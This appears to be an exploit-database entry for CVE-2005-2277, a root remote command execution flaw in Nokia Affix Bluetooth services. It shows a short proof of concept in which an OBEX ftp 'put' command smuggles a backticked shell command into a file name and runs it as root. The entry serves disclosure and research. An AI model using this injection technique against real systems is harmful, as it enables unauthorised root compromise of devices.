[] NeoSense
E X P L O I T S
title author type platform port cve id

Nokia Affix 2.0/2.1/3.x - BTSRV/BTOBEX Remote Command Execution

Author: Kevin Finisterre
type: remote
platform: hardware
port: 
date_added: 2005-07-12 
date_updated: 2013-06-05 
verified: 1 
codes: CVE-2005-2277;OSVDB-17853 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/14232/info

Nokia Affix btsrv/btobex are reported prone to a remote command execution vulnerability. The issue exists due to a lack of input sanitization that is performed before using attacker-controlled data in a 'system()' call.

Because the affected services run with superuser privileges, this issue may be exploited to fully compromise a target computer that is running the affected software.

ftp> put /etc/hosts `id`
Transfer started...
Transfer complete.
257 bytes sent in 0.9 secs (2855.56 B/s)
ftp> ls
-rwdx 257 uid=0(root) gid=0(root) groups=0(root)
Command complete.
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.